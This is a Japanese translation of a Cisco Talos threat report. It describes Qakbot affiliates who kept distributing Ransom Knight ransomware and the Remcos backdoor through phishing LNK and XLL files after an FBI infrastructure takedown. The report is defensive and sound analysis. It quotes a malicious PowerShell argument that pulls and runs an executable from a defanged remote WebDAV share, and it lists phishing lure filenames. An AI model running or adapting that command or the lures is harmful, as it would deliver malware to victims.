- 2023 年 8 月初旬から、Qakbot マルウェアの背後にいる攻撃者がランサムウェア Ransom Knight とバックドア Remcos をフィッシングメールで配布しています。
- 注目すべきは、FBI が Qakbot のインフラを差し押さえた 8 月下旬よりも前にこの攻撃活動が始まったと思われ、それ以来続いていることです。ここから見えてくるのは、法執行機関の取り締まり作戦は、Qakbot の攻撃グループがスパムメールを配信しているインフラではなく、コマンドアンドコントロール(C2)サーバーに影響を与えたにすぎないということです。
- 今回の攻撃で使用された LNK ファイルのメタデータが Qakbot による過去の「AA」攻撃や「BB」攻撃で使用されたマシンのメタデータと一致していることから、この新たな攻撃は Qakbot のアフィリエイトによるものだと Talos は考えています。
- インフラ差し押さえ後に攻撃グループが Qakbot を配布している状況は確認していないものの、今後も Qakbot は重大な脅威の進展をもたらし続けるというのが Talos の見解です。開発者が逮捕されておらず、現在も攻撃が続いていることから、この可能性は高いと見ています。攻撃グループは Qakbot のインフラを再構築する道を選ぶかもしれません。
2023 年 8 月下旬、FBI と多数の国際捜査機関、法執行機関が行った取り締まり作戦によって Qakbot マルウェアで使用されていたインフラと仮想通貨資産が差し押さえられ、攻撃グループの活動はかなりの打撃を受けました。それでもセキュリティ業界の多くの人は、Qakbot のアフィリエイトが永遠に消え去ったのか、あるいはインフラを再構築するまで一時期に活動を停止しただけなのかという疑問を持っていました。
Talos は、Qakbot の背後にいる攻撃グループは現在も活動中であり、差し押さえ直前に新たな攻撃を開始し、バックドア Remcos と同時にランサムウェア Cyclops/Ransom Knight の亜種を配布しているとある程度の確信を持っています。新たな攻撃で使用された LNK ファイルのメタデータと過去の Qakbot の攻撃に使用されたマシンとの関連を調べ、今回の新たな攻撃活動を追跡しました。
Talos は 2023 年 1 月に、LNK ファイルのメタデータを使用して攻撃者を特定し追跡する方法に関するブログ記事を掲載しました。具体的には、「AA」攻撃で使用されたドライブシリアル番号「0x2848e8a8」のマシンが、後に「BB」という新しいボットネット攻撃にどのように使用されたかを詳しく解説しています。このブログを公表した後、「AA」攻撃、「BB」攻撃、「Obama」攻撃を行った Qakbot の主要な攻撃者は、検出や追跡を困難にするために LNK ファイルのメタデータを消去し始めました。
Talos は 2023 年 8 月、先ほど触れたのと同じマシンで作成された新しい LNK ファイルを検出しました。ただし、このファイルのペイロードがコマンドラインで指定しているのは、Ransom Knight ランサムウェアを配布するネットワーク共有であることが確認されています。ファイルをさらに分析したところ、次の段階のペイロードをダウンロードするために Powershell.exe が指定されていて、下記の引数を渡していることが分かりました。
-c “explorer ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe
上記のコマンドは、Explorer.exe を開き、IP アドレスが 89[.]23[.]96[.]203 のリモートネットワーク共有に、WebDAV を使用して 80 番ポートでアクセスしようとするものです。この手法によってコマンドラインの検出を回避し、PowerShell を介してリモート実行ファイルをダウンロードしようとしている可能性があります(T1105 Ingress Tool Transfer(侵入ツールの送り込み))。
以下の LNK ファイルのファイル名は急を要する金銭上の問題をうかがわせるものであり、いかにもフィッシングメールで配布されるような内容です。この点は過去の Qakbot 攻撃と共通しています。
- ATTENTION-Invoice-29-August.docx.lnk
- bank transfer request.lnk
- Booking info.pdf.lnk
- Fattura NON pagata Agosto 2023.docx.lnk
- FRAUD bank transfer report.pdf.lnk
- invoice OTP bank.pdf.lnk
- MANDATORY-Invoice-28-August.docx.lnk
- NOT-paid-Invoice-26-August.pdf.lnk
- Nuove coordinate bancarie e IBAN 2023.docx.lnk
- Nuove coordinate bancarie e IBAN 2023.img.lnk
- Pay-Invoices-29-August.pdf.lnk
- URGENT-Invoice-27-August.docx.lnk
いくつかのファイル名はイタリア語なので、攻撃者がイタリア語圏のユーザーを標的にしていることがうかがえます。LNK ファイルは zip アーカイブで配布されており、アーカイブの中には XLL ファイルも含まれています。XLL ファイルは Excel アドインの拡張子であり、他の Excel ファイル形式に似たアイコンが付いています。
あるフィッシングメールに添付されていた zip ファイルの内容
Talos の分析によると、これらの XLL ファイルは Ransom Knight と共に実行される Remcos というバックドアであり、感染したマシンに攻撃者が後でアクセスできるようにするものです。
Ransom Knight LNK のダウンローダーと同時に配布された XLL ファイルに関する VirusTotal の情報
一方 LNK ファイルは、先に述べたコマンドラインで指定されているリモートの IP アドレス 89[.]23[.]96[.]203 から WebDAV 経由で実行ファイルをダウンロードします。この実行ファイルが実際の Ransom Knight のペイロードです。このランサムウェアファミリは、RaaS(Ransomware as a Service)の Cyclops を一から書き換えたアップデートバージョンです。Cyclops の背後にいる攻撃グループは、2023 年 5 月にこの新バージョンを発表しました。
Ransom Knight ランサムウェアを発表したダーク Web フォーラムの記事
Talos は、Qakbot 攻撃グループがこの RaaS を提供しているわけではなく、サービスの顧客にすぎないと考えています。今回の新たな攻撃活動は 2023 年 8 月初めから続いていて、差し押さえ後も活動を停止していないことから、FBI の取り締まり作戦が影響を与えたのは Qakbot のフィッシングメールを配信するインフラではなく、コマンドアンドコントロール サーバーだけだったと思われます。インフラ差し押さえ後に攻撃グループが Qakbot を配布している状況は確認していないものの、今後も Qakbot は重大な脅威の進展をもたらし続けるだろうというのが Talos の見解です。攻撃グループが活動を続けていることを考えれば、差し押さえ前の活動を完全に再開するために同グループが Qakbot のインフラを再構築する道を選ぶ可能性があります。
カバレッジ
Cisco Secure Endpoint(旧 AMP for Endpoints)は、この記事で説明したマルウェアの実行を阻止するのに最適です。Cisco Secure Endpoint の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance の Web スキャンは、悪意のある Web サイトへのアクセスを防止し、上述したような攻撃で使用されるマルウェアを検出します。
Cisco Secure Email(旧 E メールセキュリティ)は、攻撃の一環として攻撃者が送りつける不正な電子メールをブロックします。Cisco Secure Email の無料トライアルはこちらからお申し込みください。
Threat Defense Virtual、適応型セキュリティアプライアンス、Meraki MX など、Cisco Secure Firewall(旧次世代ファイアウォールおよび Firepower NGFW)アプライアンスは、この脅威に関連する悪意のあるアクティビティを検出できます。
Cisco Secure Malware Analytics(Threat Grid)は、悪意のあるバイナリを特定し、シスコのすべてのセキュリティ製品に保護機能を組み込みます。
Umbrella(シスコのセキュア インターネット ゲートウェイ(SIG))は、社内ネットワークの内外で悪意のあるドメイン、IP、URL への接続をブロックします。Umbrella の無料トライアルはこちらからお申し込みください。
Cisco Secure Web Appliance(旧 Web セキュリティアプライアンス)は、危険性のあるサイトを自動的にブロックし、ユーザーがアクセスする前に疑わしいサイトを検査します。
特定の環境および脅威データに対する追加の保護機能は、Firewall Management Center から入手できます。
Cisco Duo は、ユーザーに多要素認証を提供し、承認されたユーザーのみがネットワークにアクセスできるようにします。
ClamAV で、次の脅威を検出できます。
Lnk.Downloader.Qakbot
Win.Ransomware.Knight
Win.Backdoor.Remcos
IOC
この脅威に関連する IOC(侵害の兆候)は、こちらをご覧ください。
本稿は 2023 年 10 月 05 日に Talos Group のブログに投稿された「Qakbot-affiliated actors distribute Ransom Knight malware despite infrastructure takedown」の抄訳です。